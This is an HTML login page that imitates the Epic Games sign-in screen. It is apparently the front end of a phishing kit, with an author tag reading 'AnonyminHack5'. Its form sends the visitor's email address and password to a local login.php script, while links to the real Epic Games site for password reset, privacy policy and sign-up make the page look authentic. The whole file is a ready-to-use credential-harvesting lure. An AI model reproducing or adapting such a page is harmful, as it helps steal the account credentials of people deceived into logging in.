<!Doctype html>
<html>
<head>
	<title>Sign in - Epic games</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta charset="UTF-8"/>
<link rel="apple-touch-icon" sizes="180x180" href="favicon_io/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="favicon_io/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="favicon_io/favicon-16x16.png">
<link rel="manifest" href="favicon_io/site.webmanifest">
<meta http equiv="X-UA-compatible" content="IE=edge"/>
<noscript>Sorry your browser does not support javascript</noscript>
<meta name="author" content="AnonyminHack5">
<meta name="description" content="Login into your epic account"/>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jgthms/minireset.css@master/minireset.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/picnic">
<link href="https://fonts.googleapis.com/css?family=Chivo:300,700|Playfair+Display:700i" rel="stylesheet">
<link rel="stylesheet" href="style.css"/>
<link rel="stylesheet" href="cookieconsent.min.css"/>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <!-- Add boot strap framrworks -->
  	<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css'>
<link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css'><link rel="stylesheet" href="./style.css">

  <!-- Add icon library -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  </head>
  <body>
 <style>
body {
		background-color: black;
		color: #fff;
		text-indent: 1%;
		background-repeat: none;
width:auto;
height:auto;
resize: horizontal;
font-family: 'Chivo', sans-serif;
}
img {
width: 90%;
height: 100px;
}
#img {
width: 190%;
height: 200px;
}
.h2 {
text-align: center;
font-size: 50px;
color: #fff;
font-weight: bold;
}
p {
color: #fff;
text-indent: 2%;
font-size: 13px;
font-family: 'Chivo', sans-serif;
}
#add {
color: #fff;
font-size: 14px;
font-family: 'Chivo', sans-serif;
text-indent; 5%;
}
#img2 {
width: 50%;
height: 70px;
}
input {
background: lightgrey;
border-radius: 5px;
text-indent: 5%;
color: black;
border: none;
width: 280px;
height: 40px;
outline:orange;
}
input::placeholder {
color: black;
outline: orange;
font-family: 'Chivo', sans-serif;
}
input:hover {
outline: none;
border: none;
color:black;
opacity:none;
}
a {
color: lightgrey;
text-decoration: none;
}
a:visited{
color: lightgrey;
text-decoration: none;
}
a:hover {
color: lightblue;
text-decoration: underline;
}
a:active{
color: lightblue;
}
span {
color: lightgrey;
font-size: 13px;
}
#span1{
color: #fff;
font-size: 13px;
}
#p3 {
color: grey;
font-size: 13px;
}
input[type="checkbox"] {
  -webkit-appearance: checkbox;
     -moz-appearance: checkbox;
          appearance: checkbox;
  display: inline-block;
  width: auto;
}
label {
  color: #666;
  font-size: .875rem;
}
</style>
<div class="container">
<div class="row">
  <div class="col-md-8 col-md-offset-2">

    <div class="panel panel-default">
      <div class="panel-body">
	<img src="images/images__1_-removebg.png"/>
	</center>
	<p id="add">SIGN IN WITH AN EPIC GAMES ACCOUNT</p>
	<form action="login.php" method="post" class="form-horizontal"/>
	<div class="col-md-6">
	 <input type="email" placeholder="Email Address" name="email" class="form-control" value="" required/>
	 </div>
	 <br>
	<div class="col-md-6"> 		
	 <input type="password" placeholder="Password" name="password" id="password-field" class="form-control" value="" required/>
	 <span toggle="#password-field" class="fa fa-fw fa-eye field-icon toggle-password"></span>
            </div>
	 <br>
	 	
	 	 <input type="checkbox" value="lsRememberMe" id="rememberMe"> <label for="rememberMe">Remember me</label>
	 		
	 <p><a href="https://www.epicgames.com/id/login/epic#"> Forgot your password </a>
	<br/>
	<br/>
	<style>
		#btn {
		background: grey;
		border: none;
		border-radius: 3px;
		padding: 5px;
		text-align: center;
		font-family: small-capital;
		color: lightgrey;
		width: 220px;
		height: 45px;
		font-weight: bold;
	 }
	 #btn:hover{
	 opacity: 0.4;
	 box-shadow: none;
	 }
	 #pri {
	 color: white;
	 font-size: 13px;
	 font-family: small-capital;
	 text-align: center;
	 }
	 #priv {
	 color: lightblue;
	 font-size: 13px;
	 text-decoration: none;
	 }
	 #priv:visited {
	 color: lightblue;
	 text-decoration: none;
	 }
	 #priv:active {
	 color: lightblue;
	 text-decoration: none;
	 }
	 #priv:hover {
	 color: lightblue;
	 }
	 </style>
	 <div class="col-md-6">
	 	<center><input type="submit" id="btn" value="LOG IN NOW" onclick="lsRememberMe()"/></center>
	 </div>
	 <br>
	</form>
			<p id="pri">
				<a href="https://www.epicgames.com/privacypolicy?lang=en-GB" id="priv">Privacy Policy</a>
	        </p>
	 		<p id="p3">
	 			Don't have an Epic Games account? &nbsp;&nbsp<a href="https://epicgames.com/" id="priv">Sign up</a></p>
	<br> 		
	 	</div>
    </div>
  </div>
</div>
</div>
<!-- partial -->
  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js'></script><script  src="./script.js"></script>
  <script src="howfar.js"/>
</body>
</html>

	 		
	
	
	